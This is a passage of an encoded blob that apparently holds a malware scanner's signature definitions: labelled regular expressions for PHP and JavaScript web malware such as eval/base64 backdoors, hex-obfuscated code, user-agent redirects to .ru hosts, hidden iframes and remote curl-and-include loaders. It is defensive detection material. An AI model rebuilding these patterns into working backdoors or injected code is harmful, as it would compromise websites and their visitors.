Kik_KFwkW2Etel8wLTldK1xzKj1ccypmaWxlX2dldF9jb25=ZW5=c1woW147XSs7W1x9XHNdKikqKFwvKihcJFthLXpfMC=5XStccyo9KT9bXEBcc1=qKGZvcGVufGZ3cml=ZXxmY2xvc2UpXHMqXChbXjtdKztccyopezMsfSgoaGVhZGVyfGVjaG98cHJpbnR8aWZccypcKFteXHtdK1tce1xzXSpjaG1vZFxzKlwoKVteO1=qO1tcfVxzXSspKygkfFw_PlxzKikvaSI7fXM6NzA6ImZpbGVfZXhpc3RzIGN1cmxfaW5pdCBmaWxlX2dldF9jb25=ZW5=cyBmaWxlX3B1dF9jb25=ZW5=cyBpbmNsdWRlX29uY2UiO2E6Mjp7aTowO3M6NToiSEE=SjYiO2k6MTtzOjI=OToiLzxcP1twaFxzXSsoXCRbYS16XzAtOV=rKVxzKj1ccyouKz8oY3VybF9pbml=fGZpbGVfZ2V=X2NvbnRlbnRzXChbXHMnIl=raHR=cFtzXDpcL1=rKS4rP2ZpbGVfcHV=X2NvbnRlbnRzXChcMS4rPyhpbmNsdWRlX29uY2V8KFwkW2Etel8wLTldKylccyo9XHMqbmV3XHMrW2Etel8wLTldKylcKFwxLio_XCk7XHMqKC4qXDRbXjtdKjtccyp8XH1ccyp8ZWxzZVxzKnxce1xzKnxkaWVbXHNcKCciXStbXlwpXSpcKSs7XHMqKSooJHxcPz4pL2lzIjt9czozODoibG9uZyBzdHJpbmcgdmFyIGV2YWwgdmFyaWFibGUgZnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiSDVNSDAiO2k6MTtzOjU4NDoiLzwoXD98c2NyaXB=IGxhbmd1YWdlPSlbcGhccyciPl=rKFwkW2Etel8wLTldKyhccypcW1teXF1dK1xdKykqW1xzXC5dKj1ccyooIihbXiJdKig_PD1cXCkiKSpbXiJdKiJ8JyhbXiddKig_PD1cXCknKSpbXiddKid8XGQrfChcJFthLXpfMC=5XStbXFtcXVxkXC5dKikrKTtccyp8XC9cLy4qXHMqfFwvXCooW14qXSpcKig_IVwvKSkqW14qXSpcKlwvXHMqXHMqfFxAP2Vycm9yX3JlcG9ydGluZ1tcKDBcKVxzXSs7XHMqfGZvcihlYWNoKT9ccypcKChbXlx7XStce1teXH1dK1x9K1tcfVxzXSt8KFteO1=qO1xzKil7M3=pfFw_PlxzKjxcP1twaFxzXSspKygoZXZhbHxpZihbXHNcKFwhXEBdK1thLXpfMC=5XSspPylccypcKCkqKChcJFtcJFx7XSpbYS16XzAtOV=rKVtcfVxzXCldKihcW1teXF1dK1xdK1tcLlxzXH1dKnw9K1xzKihcJFthLXpfMC=5XSt8Y3JlYXRlX2Z1bmN=aW9uKSkqW1wpXHNceztcfV=qKSsoXCguKj9cKVtcKVxzXH=7XSspKygoW1wkXHtdKihcMTZ8XDQpW1xzXH1dKlwofGVjaG8pW147XSs7W1x9XHNdKnxcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKikqKFw_PiguKyQpP3wkfDxcL3NjcmlwdD4pL2kiO31zOjQxOiJwaHAgdmFyIGV4cGxvZGUgbnVtYmVycyBWYXJpYWJsZSBmdW5jdGlvbiI7YToyOntpOjA7czo1OiJIMjRGbCI7aToxO3M6MjE4OiIvPFw_W3BoXHNdKyhpZlxzKlwoKFteXHtdK1tce1xzXSpcJEdMT=JBTFNbXHtcW11bJyJdXFx4W147XSs7W1x9XHNdKikrKFw_PlxzKjxcP1twaFxzXSspKT9cJFthLXpfMC=5XStccyo9XHMqKCcuKz8nfCIuKz8iKTtccyouKj9ccypcJFthLXpfMC=5XStccyo9XHMqZXhwbG9kZVwoW14sXStbLCInXC4wLTlcc1=rXCk7XHMqLio_XCRbYS16XzAtOV=rXHMqXCguKj9cPz4oLiskKT8vaSI7fXM6OTM6ImZ1bmN=aW9uIFggaWYgZnVuY3Rpb25fZXhpc3RzIGN1cmxfaW5pdCBzcGFtY2hlY2tyLmNvbSBjdXJsX2V4ZWMgY3VybF9jbG9zZSBlY2hvIGFkZF9hY3Rpb24gWCI7YToyOntpOjA7czo1OiJIM=xEMiI7aToxO3M6NTcwOiIvKFwvXCouKj9cKlwvXHMqKSooXD8-XHMqPFw_W3BoXHNdKik_KGlmXHMqXChbXlx7XStce1xzKmZ1bmN=aW9uXHMrKFthLXpfMC=5XSspXChbXlx7XStce1xzKik_aWZbXHNcKFwhXStmdW5jdGlvbl9leGlzdHNcKFxzKlsnIl=oW2Etel8wLTldKylbJyJdW1xzXCldK1x7XHMqKChmdW5jdGlvblxzK1w1XCgpPy4rPyhzcGFtY2hlY2tyXC5jb218amF2YXRlcm=xXC5wd3xbJyJdanF1ZXJ5XC4pLis_Y3VybF9pbml=Lis_Y3VybF9leGVjLis_Y3VybF9jbG9zZVteO1=rWztcc1=rZWNob3xmdW5jdGlvblxzK1w1XHMqXChbXlwpXSpbXClcc1=rXHtccyooXCRbYS16XzAtOV=rXHMqPVteO1=rWztcc1=rKSooaWZbXHNcKF=rXEA_KFwkfGZvcGVuW1xzXChdKylbXlx7XStbXHtcc1=qKT9lY2hvXCh3cF9yZW1vdGVfcmV=cmlldmVfYm9keVwod3BfcmVtb3RlX2dldFwoKVteO1=rO1tcc1x9XSsoKChpZltcc1woXSt8ZWxzZSlbXlx7XStbXHNce1=rKT9hZGRfYWN=aW9uW15cLF=rXCxccypbJyJdKFw1fFw=KVsnIl1bXHNcKTtdK1tcfVxzXSopKihcPz5ccyo8XD9bcGhdKik_KFxzKlwvXCouKj9cKlwvKSovaXMiO31zOjk2OiJpZiBmdW5jdGlvbl9leGlzdHMgZnVuY3Rpb24gZXJyb3JfcmVwb3J=aW5nIFZhcmlhYmxlIHhGRiBIKiBpZiBmaWxlX2V4aXN=cyBlcnJvcl9yZXBvcnRpbmcgZW5kaWYiO2E6Mjp7aTowO3M6NToiRTkyR3AiO2k6MTtzOjI3MDoiL2lmWyBcKFwhXStmdW5jdGlvbl9leGlzdHNcKFsgJyJdKyguKz8pWyAnIl=rW1wpIFx=XStcOi4rP2Z1bmN=aW9uIFwxXChcKSBcey4rP2Vycm9yX3JlcG9ydGluZ1woMC4rPyhcJChbYS16MC=5XF9dKylbID1cdF=rIihcXHhbMC1mXXsyfSkrIjtbXHQgXHJcbl=rKFwkKFthLXowLTlcX1=rKVsgPVx=XStcJChbYS16MC=5XF9dKylcKCJIXCoiXCwuKz87W1x=IFxyXG5dKykrKStpZlsgXChcIV=rZmlsZV9leGlzdHMuKz9lcnJvcl9yZXBvcnRpbmdcKFwkLis_ZW5kaWY7L2lzIjt9czoxNzoiaW5jbHVkZSBJbWFnZUZpbGUiO2E6Mjp7aTowO3M6NToiSDEySjEiO2k6MTtzOjI1NjoiLyg_PCFcL1wvXHN7OH=pXEA_KGluY2x1ZGV8cmVxdWlyZSkoX29uY2UpP1tcKFxzXStbYS16XzAtOSxcLidccyJcL1wtXSs_KD88IUdEX1NZU1RFTV9QTFVHSU5fRElSIFwuICdcL2ltYWdlc1wvNDA=KShcLihnaWZ8anBnfHBuZ3xjYnV8Y3NzfFtccyInXStcL3dwLWluY2x1ZGVzXC9pbml=XC5waHB8W1xzIiddK1wvd3AtYWRtaW5cL2luY2x1ZGVzXC9jbGFzcy13cC1pdGVybmFsLXVwZ3JhZGVcLnBocCl8d3AtamF2YVwucGhwKVsiJ1xzXCldKzsvaSI7fXM6NDE6Ii9mdW5jdGlvbiBhcnJheSBWYXJpYWJsZSBGdW5jdGlvbiBpZiBldmFsIjthOjI6e2k6MDtzOjU6IkgzT=k=IjtpOjE7czozMjg6Ii8oXC9cKlteXCpdKihcKlteXCpcL1=qKStcL1xzKikqKChcJFtfXC=-XC5hLXowLTldKylccyo9W147XSs7XHMqKFthLXpfMC=5XSspXChbXlwpXSpcNFteXCldKltcKVxzO1=rXHMqZnVuY3Rpb25ccypcNSlccypcKFteXHtdK1x7XHMqKFwkW19cLT5cLmEtejAtOV=rKVxzKihcW1teXF1dK1xdK1xzKikqPVxzKmFycmF5KF9tYXApP1xzKlwoLis_XCk7XHMqKFwkW2Etel8wLTldKyhccypcW1teXF1dKlxdKykqW1wuXHNdKlwoLis_aWZbXHNcKF=qXCRbX1wuYS16MC=5XFsnIlxdXHNdK1wpXHMqXHspK1xzKihyZXR1cm5ccyopP2V2YWxccypcKFteXCldK1tcKVxzO1x9XSsvaXMiO31zOjQzOiJUYWdnZWQgZXJyb3JfcmVwb3J=aW5nIEhUVFBfVVNFUl9BR=VOVCBjdXJsIjthOjI6e2k6MDtzOjU6IkczTjdnIjtpOjE7czoyMjA6Ii8oZXJyb3JfcmVwb3J=aW5nXHMqXChbXjtdKztccyp8XCRbYS16XzAtOV=rXHMqPVxzKmFycmF5XHMqXChbXlwpXStcKStbO1wpXHNdKikqaWZccypcKFteXCldK=hUVFBfVVNFUl9BR=VOVCguKz9odHRwOlwvXC98Lis_Y3VybF9pbml=KXsyLH=uKz8oXCRbYS16XzAtOV=rKT9bXHM9XSpjdXJsX2V4ZWMuKz8ocHJpbnR8ZGllfGVjaG8pWyciXHNcKF=rXDNbJyJcc1wpO1x9XStccyovaXMiO31zOjMwOiJoZWFkZXIgTG9jYXRpb24gaHR=cCBzcGFjZS5waHAiO2E6Mjp7aTowO3M6NToiRTk5RHAiO2k6MTtzOjYzOiIvaGVhZGVyXChbJyJdTG9jYXRpb246IGh=dHA6XC9cL1teXC9dK1wvc3BhY2VcLnBocFw_W15cKV=rXCk7L2kiO31zOjUwOiJDb3B5cmlnaHQgZnVuY3Rpb24gZ2V=Q29va2llIGRvY3VtZW5=LndyaXRlIGlmcmFtZSI7YToyOntpOjA7czo1OiJGOVVBeCI7aToxO3M6OTE6Ii8oXC9cKi4rP1wqXC8pXHMqZnVuY3Rpb25ccysoW2Etel8wLTldKylcKC4rP25hdmlnYXRvclwudXNlckFnZW5=Lis_PGlmcmFtZSAuKz9cMlwoLis_XDEvaXMiO31zOjM3OiJDb3B5cmlnaHQgZnVuY3Rpb24gc2V=Q29va2llIGZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6IkYxQ=ZvIjtpOjE7czoxOTc6Ii9cL1wqXHMqQ29weXJpZ2h=LitccypcKlwvXHMqKGZ1bmN=aW9uIFtzZ11ldENvb2tpZVwoLis_cmV=dXJuW147XSpbO1x9XHNdKykqZnVuY3Rpb24gKFthLXowLTlcX1=rKVwoXClbXHtcc1=rKFthLXowLTlcc1w9XStuYXZpZ2F=b3JcLnVzZXJBZ2VudC4rP3xmdW5jdGlvblxzKylbc2ddZXRDb29raWVcKC4rP1wyXChbXjtdK1s7XH1cc1=rL2lzIjt9czoyMToicGhwIGhleC1lbmNvZGVkLWxpbmVzIjthOjI6e2k6MDtzOjU6Ikg1MUFlIjtpOjE7czo2MToiLzxcP1twaFxzXSsoW147XSpcXHhbMC=5YS1mXXsyfVteO1=qWztcc1=rKXs5LH=uKlxzKihcPz58JCkvaSI7fXM6MzU6InBocCBhcnJheSBodHRwIG1=X3JhbmQgbWV=YSByZWZyZXNoIjthOjI6e2k6MDtzOjU6Ikg3NUhlIjtpOjE7czoxNTE6Ii88XD9bcGhcc1=rXCRbYS16XzAtOV=rW1xzPV=rYXJyYXlbXChcc1=rKFsnIl1odHRwLitbLFwpO1xzXSspK1wkW2Etel8wLTldK1tccz1dK21=X3JhbmRcKC4rW1wpO1xzXSsoXCRbYS16XzAtOV=rW1xzPV=rLitccyopK1w_PlxzKjxtZXRhLipccyooJHxcPz4pL2kiO31zOjQ=OiJwaHAgYXJyYXkgZnVuY3Rpb24gcmV=dXJuIGJhc2U2NF9kZWNvZGUgZXZhbCI7YToyOntpOjA7czo1OiJGN1EwRCI7aToxO3M6MjI1OiIvPFw_W3BoXHNdK1wkW19cLVw-XC5hLXowLTlce1xbJyJcXVx9XStccyo9XHMqYXJyYXlcKC4rP2Z1bmN=aW9uXHMrKFthLXpfMC=5XSspXCgoLis_O1xzKikrKChcJFthLXpfMC=5XStccyo9XHMqKT8oZXZhbHxcJFthLXpfMC=5XSsoXHMqXFtbXlxdXStcXSkqKVxzKlwoXHMqKFwkXyhSRVFVRVN8R=V8UE9TKVRcWyk_W15cKV=rW1wpO1xzXSsoZXhpdHxkaWUpW147XSo7XHMqKSsoJHxcPz4pL2kiO31zOjU2OiJwaHAgaWYgaXNzZXQgR=xPQkFMUyBzdHJ=b2xvd2VyIFNFUlZFUiBpZiBzdHJzdHIgR=xPQkFMUyI7YToyOntpOjA7czo1OiJFQUFFZCI7aToxO3M6MjQxOiIvPFw_W3BoXSpccytpZltcKFxzXStcIWlzc2V=W1woXHNdK1wkR=xPQkFMU1xbIlxceFteXF1dK1tcXVwpXHNce1=rKFwkW2Etel8wLTldKylbXHM9XStzdHJ=b2xvd2VyW1woXHNdK1wkX1NFUlZFUlxbIlxceFteXF1dK1tcXVwpO1xzXSsoKGlmfGFuZClbXChcc1whXStzdHJzdHJbXChcc1=rXDFbXHMsIiddK1xceFteXCldK1tcKVxzXHtdKykrXCRHTE9CQUxTXFsiXFx4W15cXV=rXF1bXjtdKjtbXH1cc1=rKFw_PnwkKS9pIjt9czo=MjoiZnVuY3Rpb24gcmV=dXJuIGZ1bmN=aW9uIFZhcmlhYmxlIGZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6IkVBS=FCIjtpOjE7czoyMDI6Ii8oZnVuY3Rpb25bYS16XzAtOVxzXStcKFteXCldKltcKVxzXStce1xzKnJldHVyblthLXpfMC=5XHNdK1woW15cKV=qW1wpXHNdKzsqXH=rXHMqKSsoXCRbYS16XzAtOV=rWz1cc1=rKFthLXpfMC=5XHNdK1woW15cKV=qW1wpXHNdK3xbJyJdW147XSopOytccyopKyhcJFthLXpfMC=5XSspWz1cc1=rW147XStbJyJcKTtdK1xzKlw=XHMqXCgrLio_XCk7L2kiO31zOjE3OiJldmFsIGNociBSRVBFQVRFRCI7YToyOntpOjA7czo1OiJHNUJOYSI7aToxO3M6MjEyOiIvKDxcP1twaF=qfFwvXCpbXlwqXSpcKlwvKVxzKigoXCRbYS16XzAtOV=rKVxzKj1ccyonKT8oLis_XC5ccypjaHJcKFswLTldK1wpXHMqXC4pezIwfS4rXHMqKFwzXHMqPVxzKnN=cl9yZXBsYWNlXCgnXCNbJyxcc1=rXDNcKTtccyopPygoXCRbYS16XzAtOV=rKVxzKj1ccypjcmVhdGVfZnVuY3Rpb25cKFsnXHMsXSpcM1wpO1xzKlw3XChcKTspPyhcPz5ccyp8JHxcMSkvaSI7fXM6MzY6ImdhcmJhZ2UgYXJvdW5kIGV2YWwgVmVyaWFibGVGdW5jdGlvbiI7YToyOntpOjA7czo1OiJHNU42YiI7aToxO3M6MjQ4OiIvPFw_W3BoXHNdKyhcJFthLXpfMC=5XStbXHNcLl=qPShbXHNcLl=qKChbIiddKS4rPyg_PCFfZSlcNHxcL1wqW15cKl=qKFwqW15cKlwvXSopK1wvfFwkW1wkXHtdKlthLXpfMC=5XSpbXH1cc1=qKFxbW15cXV=rXF=rXHMqKSopKSs7XHMqKSsoKGV2YWx8aWYpXHMqXCgpP1wkW1wkXHtdKlthLXpfMC=5XStbXH1cc1=qKFxbW15cXV=rXF1bXHNdKikqXCguKj8oLisnW1wuO1wpXSspPyhccyonLisnW1wuO1wpXSspKlxzKihcPz58JCkvaSI7fXM6NTY6ImlmIGRlZmluZWQgZGVmaW5lIGZ1bmN=aW9uIGdsb2JhbCBldmFsIFZhcmlhYmxlIEZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6IkhBOEIyIjtpOjE7czozMTE6Ii9pZltcKFxzXStcIWRlZmluZWRcKFteXCldK1tcKVxzXStce1xzKmRlZmluZVwoW15cKV=rW1wpXHNdKztccyooXCRbYS16XzAtOV=rW1xzXC5dKj1bXjtdKjtccyopKmZ1bmN=aW9uXHMrKFteXChdKilcKFteXCldKltcKVxzXStce1xzKihnbG9iYWwgKFwkW147XSspO1xzKnwoXCRbYS16XzAtOV=rW1xzXC5dKj1bXjtdKjtccyopKmZvcihlYWNoKT9ccypcKCkoLitbXHJcbl=rKStldmFsKFwvXCooW14qXSpcKig_IVwvKSkqW14qXSpcKlwvXHMqKSpcKChcMnxcNClcKFteXCldKltcKVxzXSs7KFxzKnJldHVyblteO1=qO1xzKlx9KT9ccypcfS9pIjt9czoyNToiaWZyYW1lIHNtYWxsIGhlaWdodHx3aWR=aCI7YToyOntpOjA7czo1OiJIM=ZFOCI7aToxO3M6MTU2OiIvKDxzY3JpcHRbXj5dK3NyYz1bJyJdP2h=dHBcOlwvXC8oW2EtelwuXC=wLTldKylbXj5dKj48XC9zY3JpcHQ-KT88aWZyYW1lLio_KFxzKihoZWlnaHR8d2lkdGh8c3JjKT1bJyJdPyhbMC=1XVsnIlxzXXxodHRwXDpcL1wvW14-XSs_KSl7M31bXj5dKj48XC9pZnJhbWU-L2kiO31zOjQ5OiJwaHAgZ2xvYmFsIGFycmF5IGZ1bmN=aW9uX2V4aXN=cyByZXR1cm4gZm9yIHVuc2V=IjthOjI6e2k6MDtzOjU6IkVDODFPIjtpOjE7czoyNjE6Ii9nbG9iYWwgKFwkW2EtejAtOVxfXSspO1xzKlwxW1xzPV=rYXJyYXlcKC4rP2Z1bmN=aW9uX2V4aXN=c1woW15cKV=rW1wpXHNcJl=rXCFmdW5jdGlvbl9leGlzdHNcKFsnIl=oW2EtejAtOVxfXSspWyciXVtcKVxzXHtdK2Z1bmN=aW9uXHMrXDJcKFteXCldK1tcKVxzXHtdK2dsb2JhbCBcMTsuKz9yZXR1cm5bXjtdKls7XHNcfV=rZm9yXHMqXChbXlwpXSpbXCk7XH1dKyhce1xzKltcJGEtejAtOVxfXStcKFteXCldK1tcKTtcfV=rKT91bnNldFwoXDFcKTsvaSI7fXM6MTM6ImV2YWwgcGFjayBIZXgiO2E6Mjp7aTowO3M6NToiRjhURG8iO2k6MTtzOjMyNToiLyhcL1wqLio_XCpcL1xzKnxcJFthLXpfMC=5XFsnIlxdXHNdKz1ccyooWyciXSkuKj9cMjtccyopKihpZltcc1woXCFdK2Z1bmN=aW9uX2V4aXN=c1tcKFxzXSsoWyciXSkoW2Etel8wLTldKylcNFtcKVxzXStce1xzKik_KGZ1bmN=aW9uXHMrKFthLXpfMC=5XSspXChbXlwpXSpbXClcc1=rXHtbXlx9XStwYWNrXChbJyJdSFwqWyciLFxzXC4wLTlBLUZdK1tcKTtcc1=rcmV=dXJuW147XSpbO1xzXStcfVs7XHNdKyk_ZXZhbFwoKFw1XChbXlwpXSpbXCk7XHNcfV=rfFw3XChbXlwpXSpbXCk7XHNdK3xwYWNrXChbJyJdSFwqWyciLFxzXC4wLTlBLUZdK1tcKTtcc1=rKS9pcyI7fXM6NDc6InBocCBIVFRQX1VTRVJfQUdFTlQgaWYgaGVhZGVyIExvY2F=aW9uIGh=dHAgLnJ1IjthOjI6e2k6MDtzOjU6IkczMUxSIjtpOjE7czozMTA6Ii88XD9bcGhcc1=qKFwkW2Etel8wLTldKylccyo9XHMqKGFycmF5XChbXlwpXStcLnJ1WyciXVwpKztccyooXCRbYS16XzAtOV=rKVxzKj1ccypcMVxbLis7XHMqKFwkW2Etel8wLTldKylccyo9W1xzXChdKnByZWdfbWF=Y2hccyp8XCRfU=VSVkVSXFtbIiddSFRUUF9VU=VSX=FHRU5UWyciXVxdO1xzKmlmW1xzXChdK1tcJGEtel8wLTldKylcKC4qKFwzfFwxKS4qW1wpXHNce1=raGVhZGVyXChbJyJdTG9jYXRpb246XHMqKGh=dHA6XC9cLy4rXC5ydVwvLip8WyciXC5cc1=rfFwxfFwzfFw=KStcKTtbXHNkaWVcKFwpO1x9XSooXD8-XHMqfCQpL2kiO31zOjg=OiJyZXF1aXJlX29uY2Ugd3AtdXBkYXRlLnBocCBSRU1PVEVfQUREUiBIVFRQX1VTRVJfQUdFTlQgcmVxdWlyZV9vbmNlIHdwLWNsYXNzLnBocCBkaWUiO2E6Mjp7aTowO3M6NToiRjNLR3IiO2k6MTtzOjE5NjoiLzxcPy4rP3JlcXVpcmVfb25jZVtcc1woIiddK3dwLXVwZGF=ZVwucGhwWyInXCk7XHNdK1wkaXAgPSBcJF9TRVJWRVJcW1siJ11SRU1PVEVfQUREUlsiJ11cXTsuKz9cJF9TRVJWRVJcW1siJ11IVFRQX1VTRVJfQUdFTlRbIiddXF=uKz9yZXF1aXJlX29uY2VbXHNcKCInXSt3cC1jbGFzc1wucGhwWyInXCk7XHNdK2RpZVwoLis_KCR8XD8-KS9pcyI7fXM6MzY6ImV2YWwgZGVjb2RlVVJJQ29tcG9uZW5=IEVuY29kZWQtdGV4dCI7YToyOntpOjA7czo1OiJINThJZCI7aToxO3M6MTkzOiIvKFwvXCooW14qXSpcKig_IVwvKSkqW14qXSpcKlwvXHMqfFwvXC8uK1xzKnxlcnJvcl9yZXBvcnRpbmdcKFswXCk7XHNdKykqZXZhbFtcc1woXSsoZ3p1bmNvbXByZXNzfGRlY29kZVVSSUNvbXBvbmVudClbXHNcKF=rKFsnIl=pLis_XDRbXClcc1=rO1xzKihcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKnxcL1wvLitccyopKi9pIjt9czo4NjoiZnVuY3Rpb25zIEJETiBTVkIgU=NrIEdDayBpZiBjb29raWVFbmFibGVkIEdDayBlbHNlIFNDayBpZiBsb2FkZWQgU1ZCIGFkZEV2ZW5=TGlzdGVuZXIiO2E6Mjp7aTowO3M6NToiRUNGR1oiO2k6MTtzOjQzMDoiL2Z1bmN=aW9uIEJETlwoLis_ZnVuY3Rpb24gU1ZCXCguKz9mdW5jdGlvbiBTQ2tcKC4rP2Z1bmN=aW9uIEdDa1woLis_cmV=dXJuIHVuZXNjYXBlXChkb2N1bWVudFwuY29va2llXC5zdWJzdHJpbmdcKFteXCldK1tcKTtcc1x9XStpZltcc1woXStuYXZpZ2F=b3JcLmNvb2tpZUVuYWJsZWRbXClcc1x7XStpZltcc1woXCFdK=dDa1woW15ce1=rXHtbXH1lbHNlXHtcc1=qU=NrXChbXlwpXStbXCk7XHNdK2lmW1xzXChdK2RvY3VtZW5=XC5sb2FkZWRbXClce1xzXStTVkJcKFteXCldKltcKTtcc1x9XStlbHNlW1x7XHNdK2lmW1xzXChdK3dpbmRvd1wuYWRkRXZlbnRMaXN=ZW5lcltcKVx7XHNdK3dpbmRvd1wuYWRkRXZlbnRMaXN=ZW5lclwoW15cKV=rW1wpO1xzXH1dK2Vsc2VbXHtcc1=rd2luZG93XC5hdHRhY2hFdmVudFwoW15cKV=rW1wpO1xzXH1dKy9pcyI7fXM6MTg6ImRpdiBzdHlsZSBvcGFjaXR5MCI7YToyOntpOjA7czo1OiJGMzhJTSI7aToxO3M6OTM6Ii9ccyo8ZGl2IHN=eWxlPVsnIl1bXj5dKm9wYWNpdHlccyouXHMqMChbXlwuXXxcLlswLTFdKVtePl=qPlxzKig8YSAuKz88XC9hPlxzKikrLis_PFwvZGl2Pi9pcyI7fXM6NDQ6InBocCBlcnJvcl9yZXBvcnRpbmcgTG9uZyBtYWlsIHByaW5=X3IgU=VSVkVSIjthOjI6e2k6MDtzOjU6IkgyMk1GIjtpOjE7czozMTU6Ii88XD9bcGhcc1=qKGVycm9yX3JlcG9ydGluZ1woLns5OTk5LH18KFwkW2Etel8wLTldK1xzKj1ccyooMXxcJF8oUkVRVUVTfEdFfFBPUylUKFxzKlxbW15cXV=rXF=rKSspO1xzKikrKGlmXHMqXChbXlwpXStbXClcc1x7XStkaWVbXHNcKF=rW147XSs7W1xzXH1dKikraWZccypcKFteXCldK1tcKVxzXHtdK3doaWxlXHMqXChbXlwpXStbXClcc1x7XSspbWFpbFxzKlwoLisocHJpbnRfclwoXCRfU=VSVkVSLit8XHMqZWNoby4rXHMqXCRbYS16XzAtOVwrO1=rW1x9XHNdKikoXD8-KChccypbXFs8XWh=bWxbXF=-XSl7Mn1bXiRdKzxcL2h=bWw-KT98JCkvaSI7fXM6Njc6ImlmICFmdW5jdGlvbl9leGlzdHMgZnVuY3Rpb24gY3VybCByZXR1cm4gZnVuY3Rpb24gaW5jbHVkZSBmdW5jdGlvbnMiO2E6Mjp7aTowO3M6NToiRUNNMjQiO2k6MTtzOjI4NzoiL2lmXHMqXChccypcIWZ1bmN=aW9uX2V4aXN=c1woWyInXShbYS16XzAtOV=rKVsnIl1cKVtcKVxzXHtdKmZ1bmN=aW9uXHMqXDFcKFteXCldK1wpW1wpXHNce1=rKFteXG5dKmN1cmxfW15cbl=rXHMrKStyZXR1cm5bXlxuXStbXHMrXH1dK2Z1bmN=aW9uXHMqW2Etel8wLTldK1woW15cKV=qXClbXClcc1x7XSsoKFwkW2Etel8wLTldKylccyo9XHMqKFthLXpfMC=5XSspXChbXlxuXStccyspK2luY2x1ZGVbXChcc1=rXDQuKz9mdW5jdGlvblxzK1w1Lis_KCR8KD89ZnVuY3Rpb24gKXwoPz1cP1w-KSkvaXMiO31zOjU5OiJpZiAhY3VycmVudF91c2VyX2NhbiBhZGRfZmlsdGVyIGZ1bmN=aW9uIGEgaHJlZiBodHRwIHJldHVybiI7YToyOntpOjA7czo1OiJFQ==zUiI7aToxO3M6MjY1OiIvaWZccypcKFxzKlwhY3VycmVudF91c2VyX2NhblwoW15cKV=rW1wpXHNce1=qYWRkX2ZpbHRlcltccypcKF=rW14sXSssXHMqWyInXShbYS16XzAtOV=rKVsnIl1cKVtcKTtcc1x9XStmdW5jdGlvblxzKlwxXCguKz9hZGRfZmlsdGVyW1xzKlwoXStbXixdKyxccypbIiddKFthLXpfMC=5XSspWyciXVwpW1wpO1xzXH1dKy4rcmV=dXJuW147XSpbO1xzXH1dK2Z1bmN=aW9uXHMqXDJcKC4rPzxhIGhyZWY9WyciXWh=dHA6XC9cLy4rcmV=dXJuW147XSpbO1xzXH1dKy9pIjt9czo1OToicGhwIEFycmF5IGZ1bmN=aW9uIHJldHVybiBiYXNlNjRfZGVjb2RlIGV2YWwgRnVuY3Rpb24gQXJyYXkiO2E6Mjp7aTowO3M6NToiRUNONXQiO2k6MTtzOjE4MzoiLzxcP1twaFxzXSsoXCRbYS16XF8wLTldK1xzKj1bXjtdK1s7XHNdKykqKFwkW1wkXHtdKlthLXpcXzAtOV=rXH=qKFxzKlxbW15cXV=rXF=pKilccyo9XHMqYXJyYXkuKz9mdW5jdGlvbiAoW2EtelxfMC=5XSspLis_cmV=dXJuIGJhc2U2NF9kZWNvZGUuKz9ldmFsXChccypcNFteO1=rXDJbXjtdK1s7XHNcfVw_Pl=rL2lzIjt9czozODoicGhwIFZhciBBcnJheSBDb25jYXQgVmFyaWFibGUgRnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiRzVON=8iO2k6MTtzOjIzNToiLzxcP1twaFxzXSsoXC9cLy4qW1xzXSspKigoXCRbYS16XzAtOV=rKVxzKj1ccyooKCdbXiddKig_PCFfZSknfCJbXiJdKiJ8XCRbYS16XzAtOV=rKVtcc1wuXSopK1teO1=qO1xzKikrPyhcQD9cJChbXCRce1=qW2Etel8wLTldK1x9KihccypcW1teXF1dK1xdKSpccyo9W1xzXEA_XCRce1=qXCQpP1tcJFx7XSpbYS16XzAtOV=rXH=qKFxzKlxbW15cXV=rXF=pKlxzKlwoW147XSs7XHMqKSsuKlxzKigkfFw_PikvaSI7fXM6NjM6InBocCBhcnJheSBpbXBsb2RlIGZ1bmN=aW9uIFZhciBIZXggcmV=dXJuIFZhcmlhYmxlRnVuY3Rpb24gZXZhbCI7YToyOntpOjA7czo1OiJFQ1BEMiI7aToxO3M6Mjg=OiIvPFw_W3BoXHNdKyhcJFthLXpcXzAtOV=rKVxzKj1ccyphcnJheVteO1=rWztcc1=rLis_KFwkW2EtelxfMC=5XSspXHMqPVxzKmltcGxvZGVbXjtdK1wxW147XStbO1xzXStmdW5jdGlvbiAoW2EtelxfMC=5XSspXChbXlwpXStbXClce1xzXSsoXCRbYS16XF8wLTldK1xzKj1bXHMnIl=rKFxceFswLTlhLWZdezJ9KStbJyJdO1xzKikrcmV=dXJuW147XSs_XCRbYS16XF8wLTldKyhccypcW1teXF1dK1xdKSpcKFteO1=rWztcfVxzXStldmFsXChcM1woXHMqXDJbXjtdK1s7XHNdKy4rPygkfFw_PikvaSI7fXM6NTg6InBocCBhcnJheSBpZiBTRVJWRVIgaWYgaXNib3QgZmlsZV9nZXRfY29udGVudHMgaGVhZGVyIGh=dHAiO2E6Mjp7aTowO3M6NToiRkFWRjkiO2k6MTtzOjI5ODoiLzxcP1twaFxzXSsoKGVycm9yX3JlcG9ydGluZ3xpbmlfc2V=KVxzKlwoW147XSo7XHMqKSooXCRbYS16XF8wLTldK1xzKj1bXjtdK1s7XHNdKykrKGlmW147XStcJGlzYm9=W147XStbO1x9XHNdKykrKC4rPyhcJFthLXpfMC=5XSspXHMqPVxzKihmaWxlX2dldF9jb25=ZW5=c3xjdXJsX2V4ZWMpXHMqXChbXlx9XStbXH1cc1=rKSsoKFwkW2EtelxfMC=5XSspXHMqPVteO1=qXDZbXjtdKls7XHNdKykqLisoKFw2fFw5KVteO1=rWztcfVxzXSsoKGhlYWRlcnxlY2hvfHByaW5=KVteO1=rWztcfVxzXSspKykrKCR8XD8-KS9pcyI7fXM6NDM6InBocCBSRVFVRVNUIGFycmF5IFJFUVVFU1QgYXJyYXlfZmlsdGVyIGV4aXQiO2E6Mjp7aTowO3M6NToiRUNRQ3AiO2k6MTtzOjE5NjoiLzxcP1twaFxzXSsoXCRbYS16XF8wLTldKylccyo9XHMqXCRfKFJFUVVFU3xHRXxQT1MpVFxbW147XStbO1xzXSsoXCRbYS16XF8wLTldKylccyo9XHMqYXJyYXlcKFwkXyhSRVFVRVN8R=V8UE9TKVRcW1teO1=rWztcc1=rXCRbYS16XF8wLTldK1xzKj1ccyphcnJheV9maWx=ZXJcKFwzWy